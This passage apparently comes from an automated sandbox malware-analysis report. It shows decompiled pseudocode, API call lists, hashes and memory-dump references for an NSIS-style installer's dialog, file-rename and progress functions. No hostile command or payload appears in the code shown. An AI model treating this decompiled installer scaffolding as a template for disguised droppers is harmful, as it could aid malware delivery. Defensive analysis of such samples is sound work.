                                                            • SetWindowTextA.USER32(00000000,?), ref: 004047DF
                                                            • SHBrowseForFolderA.SHELL32(?,00436068,?), ref: 00404890
                                                            • CoTaskMemFree.OLE32(00000000), ref: 0040489B
                                                            • lstrcmpiA.KERNEL32(Copy failed,0043C090,00000000,?,?), ref: 004048CD
                                                            • lstrcatA.KERNEL32(?,Copy failed), ref: 004048D9
                                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004048EB
                                                              • Part of subcall function 00405951: GetDlgItemTextA.USER32 ref: 00405964
                                                              • Part of subcall function 00406535: CharNextA.USER32(0000000B), ref: 0040658D
                                                              • Part of subcall function 00406535: CharNextA.USER32(0000000B), ref: 0040659A
                                                              • Part of subcall function 00406535: CharNextA.USER32(0000000B), ref: 0040659F
                                                              • Part of subcall function 00406535: CharPrevA.USER32(0000000B,0000000B), ref: 004065AF
                                                            • GetDiskFreeSpaceA.KERNEL32(00434060,?,?,0000040F,?,00434060,00434060,?,00000001,00434060,?,?,000003FB,?), ref: 004049A9
                                                            • MulDiv.KERNEL32 ref: 004049C4
                                                              • Part of subcall function 00404B1D: lstrlenA.KERNEL32(0043C090,0043C090,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A38,000000DF,00000000,00000400,?), ref: 00404BBB
                                                              • Part of subcall function 00404B1D: wsprintfA.USER32 ref: 00404BC3
                                                              • Part of subcall function 00404B1D: SetDlgItemTextA.USER32(?,0043C090), ref: 00404BD6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$Copy failed$`@C
                                                            • API String ID: 2624150263-2532524891
                                                            • Opcode ID: 716a1688ca695c3a3c546a5cfd34f8cd1780d97e0ef75404fa2bc64f02add2a4
                                                            • Instruction ID: 1e5cde7c6216eed5206fee0a992a61c18a0705ae5e449ea6cb8cf0fac14b4d51
                                                            • Opcode Fuzzy Hash: 716a1688ca695c3a3c546a5cfd34f8cd1780d97e0ef75404fa2bc64f02add2a4
                                                            • Instruction Fuzzy Hash: 74A16EB1A00209ABDB11AFA6CD41BAF77B8AF84314F10847BF601B62D1D77C99418F6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405EC0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00405EC0(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x448620 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x448a20, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x448220, "%s=%s\r\n", 0x448620, 0x448a20);
						_t53 = _t52 + 0x10;
						E004062EA(_t37, 0x400, 0x448a20, 0x448a20,  *((intOrPtr*)( *0x452430 + 0x128)));
						_t12 = E00405DEA(0x448a20, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E62(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D4F(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D4F(_t38, _t21 + 0xa, 0x40a3d8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405DA5(_t24 + _t46, 0x448220, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E91(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DEA(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x448620, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                            0x00405ec0
                                                            0x00405ec9
                                                            0x00405ed0
                                                            0x00405ee4
                                                            0x00405f0c
                                                            0x00405f17
                                                            0x00405f1b
                                                            0x00405f3b
                                                            0x00405f42
                                                            0x00405f4c
                                                            0x00405f59
                                                            0x00405f5e
                                                            0x00405f63
                                                            0x00405f67
                                                            0x00405f76
                                                            0x00405f78
                                                            0x00405f85
                                                            0x00405f89
                                                            0x00406024
                                                            0x00000000
                                                            0x00405f9f
                                                            0x00405fac
                                                            0x00405fd0
                                                            0x00405fd4
                                                            0x00405ff3
                                                            0x00405ff7
                                                            0x00405ff7
                                                            0x00405ff9
                                                            0x00406002
                                                            0x0040600d
                                                            0x00406018
                                                            0x0040601e
                                                            0x00000000
                                                            0x0040601e
                                                            0x00405fd6
                                                            0x00405fd9
                                                            0x00405fe4
                                                            0x00405fe0
                                                            0x00405fe2
                                                            0x00405fe3
                                                            0x00405fe3
                                                            0x00405feb
                                                            0x00405fed
                                                            0x00000000
                                                            0x00405fed
                                                            0x00405fb7
                                                            0x00405fbd
                                                            0x00000000
                                                            0x00405fbd
                                                            0x00405f89
                                                            0x00405f67
                                                            0x00405ee6
                                                            0x00405ef1
                                                            0x00405efa
                                                            0x00405efe
                                                            0x00000000
                                                            0x00000000
                                                            0x00405efe
                                                            0x0040602f

                                                            APIs
                                                            • CloseHandle.KERNEL32(00000000), ref: 00405EF1
                                                            • GetShortPathNameA.KERNEL32 ref: 00405EFA
                                                              • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                              • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                            • GetShortPathNameA.KERNEL32 ref: 00405F17
                                                            • wsprintfA.USER32 ref: 00405F35
                                                            • GetFileSize.KERNEL32(00000000,00000000,00448A20,C0000000,00000004,00448A20,?,?,?,?,?), ref: 00405F70
                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7F
                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB7
                                                            • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,00448220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 0040600D
                                                            • GlobalFree.KERNEL32(00000000), ref: 0040601E
                                                            • CloseHandle.KERNEL32(00000000), ref: 00406025
                                                              • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F4C,00489000,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                              • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E10
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                            • String ID: %s=%s$[Rename]
                                                            • API String ID: 2171350718-1727408572
                                                            • Opcode ID: 86c75f9ffb992eab75565988558f4edcfd0a1f7ba9e91908d43dc06201ce60aa
                                                            • Instruction ID: a927ddba45d5df7a47f9583d2fa9cd5bb3fc37aebfc63fa68c1436a548016810
                                                            • Opcode Fuzzy Hash: 86c75f9ffb992eab75565988558f4edcfd0a1f7ba9e91908d43dc06201ce60aa
                                                            • Instruction Fuzzy Hash: 7C310531200B166BC2207B659D48F6B7A9CEF49758F15043FFA42F62D2DB7CD8118AAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040433B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040433B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                            0x0040434d
                                                            0x00404403
                                                            0x00000000
                                                            0x00404403
                                                            0x0040435e
                                                            0x00404362
                                                            0x00000000
                                                            0x0040437c
                                                            0x0040437c
                                                            0x00404385
                                                            0x00000000
                                                            0x00000000
                                                            0x00404387
                                                            0x00404393
                                                            0x00404396
                                                            0x00404396
                                                            0x0040439c
                                                            0x004043a2
                                                            0x004043a2
                                                            0x004043ae
                                                            0x004043b4
                                                            0x004043bb
                                                            0x004043be
                                                            0x004043c1
                                                            0x004043c3
                                                            0x004043c3
                                                            0x004043cb
                                                            0x004043d1
                                                            0x004043d1
                                                            0x004043db
                                                            0x004043e0
                                                            0x004043e3
                                                            0x004043e8
                                                            0x004043eb
                                                            0x004043eb
                                                            0x004043fb
                                                            0x004043fb
                                                            0x00000000
                                                            0x004043fe

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                            • String ID:
                                                            • API String ID: 2320649405-0
                                                            • Opcode ID: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
                                                            • Instruction ID: d64fbe2596ca860a271eaf52242e9b3e10407c8dba4713a28e38d7cfcaef20bb
                                                            • Opcode Fuzzy Hash: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
                                                            • Instruction Fuzzy Hash: 822174716007049FCB30DF68D908B5BBBF8AF81710B04892EED96A26E1C734D915CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C32128 Relevance: 10.6, APIs: 7, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E73C32128(intOrPtr* _a4) {
				short _v84;
				intOrPtr* _t24;
				signed int _t25;
				intOrPtr _t26;
				intOrPtr _t33;
				void* _t39;
				void* _t42;

				_t39 = E73C312C6();
				_t24 = _a4;
				_t33 =  *((intOrPtr*)(_t24 + 0x814));
				_t42 = (_t33 + 0x41 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t42 - 4)) >= 0) {
					}
					_t25 =  *(_t42 - 8) & 0x000000ff;
					if(_t25 <= 7) {
						switch( *((intOrPtr*)(_t25 * 4 +  &M73C32268))) {
							case 0:
								 *_t39 = 0;
								goto L17;
							case 1:
								__edx =  *__edx;
								if(__ecx > 0) {
									__ecx = __ecx - 1;
									__ecx = __ecx *  *(0x73c34060 + __eax * 4);
									asm("sbb eax, eax");
									__edx = __edx &  *(0x73c34080 + __eax * 4);
								}
								_push(__edx);
								goto L15;
							case 2:
								_push(__edi);
								_push(__edx[1]);
								_push( *__edx);
								__eax = E73C3144D(__ecx);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__edx,  *0x73c35040);
								goto L17;
							case 4:
								__ecx =  *0x73c35040;
								__ecx - 1 = WideCharToMultiByte(0, 0,  *__edx, __ecx, __edi, __ecx - 1, 0, 0);
								__eax =  *0x73c35040;
								 *((char*)(__eax + __edi - 1)) = 0;
								goto L17;
							case 5:
								_push(0x27);
								__eax =  &_v84;
								_push( &_v84);
								_push( *__edx);
								__imp__StringFromGUID2();
								__ecx = 0;
								__eax =  &_v84;
								__eax = WideCharToMultiByte(0, 0,  &_v84,  &_v84, __edi,  *0x73c35040, 0, 0);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x73c34058);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					if( *(_t42 + 0x14) != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t42 - 4)) > 0)) {
						GlobalFree( *(_t42 + 0x14));
					}
					_t26 =  *((intOrPtr*)(_t42 + 0xc));
					if(_t26 != 0) {
						if(_t26 != 0xffffffff) {
							if(_t26 > 0) {
								E73C315C7(_t26 - 1, _t39);
								goto L26;
							}
						} else {
							E73C3157E(_t39);
							L26:
						}
					}
					_t42 = _t42 - 0x20;
					_t33 = _t33 - 1;
				} while (_t33 >= 0);
				return GlobalFree(_t39);
			}










                                                            0x73c32136
                                                            0x73c32138
                                                            0x73c3213b
                                                            0x73c32147
                                                            0x73c32149
                                                            0x73c3214e
                                                            0x73c3214e
                                                            0x73c32156
                                                            0x73c3215d
                                                            0x73c32163
                                                            0x00000000
                                                            0x73c3216a
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32172
                                                            0x73c32176
                                                            0x73c32178
                                                            0x73c32179
                                                            0x73c32184
                                                            0x73c32188
                                                            0x73c32188
                                                            0x73c3218f
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32192
                                                            0x73c32193
                                                            0x73c32196
                                                            0x73c32198
                                                            0x00000000
                                                            0x00000000
                                                            0x73c321a8
                                                            0x00000000
                                                            0x00000000
                                                            0x73c321d8
                                                            0x73c321ee
                                                            0x73c321f4
                                                            0x73c321f9
                                                            0x00000000
                                                            0x00000000
                                                            0x73c321b0
                                                            0x73c321b2
                                                            0x73c321b5
                                                            0x73c321b6
                                                            0x73c321b8
                                                            0x73c321be
                                                            0x73c321ca
                                                            0x73c321d0
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32200
                                                            0x73c32202
                                                            0x73c32208
                                                            0x73c3220e
                                                            0x73c3220e
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32163
                                                            0x73c32211
                                                            0x73c32215
                                                            0x73c32228
                                                            0x73c32228
                                                            0x73c3222e
                                                            0x73c32233
                                                            0x73c32238
                                                            0x73c32244
                                                            0x73c32249
                                                            0x00000000
                                                            0x73c3224e
                                                            0x73c3223a
                                                            0x73c3223b
                                                            0x73c3224f
                                                            0x73c3224f
                                                            0x73c32238
                                                            0x73c32250
                                                            0x73c32253
                                                            0x73c32253
                                                            0x73c32267

                                                            APIs
                                                              • Part of subcall function 73C312C6: GlobalAlloc.KERNELBASE(00000040,73C311C4,-000000A0), ref: 73C312CE
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C32228
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C3225D
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1284018983.0000000073C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 73C30000, based on PE: true
                                                            • Associated: 00000010.00000002.1284008674.0000000073C30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000010.00000002.1284039391.0000000073C34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000010.00000002.1284051137.0000000073C36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_73c30000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: 2d4d8a017e0ce906edc8196db2defb5fa6904fce3a30cc7c4a1a9e1b35b857ae
                                                            • Instruction ID: cf5c5f2219e01ad68347a77add7b0231ebfe3b4f46f42246f5a33aeae5b11193
                                                            • Opcode Fuzzy Hash: 2d4d8a017e0ce906edc8196db2defb5fa6904fce3a30cc7c4a1a9e1b35b857ae
                                                            • Instruction Fuzzy Hash: 9641067220824CEFEB169F56CD85FAA7BB9FB46710F954119E905DA180D732BC40CBA3
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404C27 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00404C27(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                            0x00404c35
                                                            0x00404c42
                                                            0x00404c48
                                                            0x00404c86
                                                            0x00404c86
                                                            0x00404c95
                                                            0x00404c9c
                                                            0x00000000
                                                            0x00404c9e
                                                            0x00404c4a
                                                            0x00404c59
                                                            0x00404c61
                                                            0x00404c64
                                                            0x00404c76
                                                            0x00404c7c
                                                            0x00404c83
                                                            0x00000000
                                                            0x00404c83
                                                            0x00000000

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$ClientScreen
                                                            • String ID: f
                                                            • API String ID: 41195575-1993550816
                                                            • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                            • Instruction ID: 6a0354fd0873e2a66e4e803e7b6bfaf8a717de4a4c12bc6328b4bc3a065c57a7
                                                            • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                            • Instruction Fuzzy Hash: DB015E71900219BAEB00DBA4DD85BFFBBBCAF55B25F10012BBB40B61D0C7B499018BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402E25 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00402E25(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x426040; // 0xa399b
					_t11 =  *0x43204c;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                            0x00402e32
                                                            0x00402e40
                                                            0x00402e46
                                                            0x00402e46
                                                            0x00402e54
                                                            0x00402e56
                                                            0x00402e5c
                                                            0x00402e63
                                                            0x00402e65
                                                            0x00402e65
                                                            0x00402e7b
                                                            0x00402e8b
                                                            0x00402e9d
                                                            0x00402e9d
                                                            0x00402ea5

                                                            APIs
                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E40
                                                            • MulDiv.KERNEL32 ref: 00402E6B
                                                            • wsprintfA.USER32 ref: 00402E7B
                                                            • SetWindowTextA.USER32(?,?), ref: 00402E8B
                                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E9D
                                                            Strings
                                                            • verifying installer: %d%%, xrefs: 00402E75
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
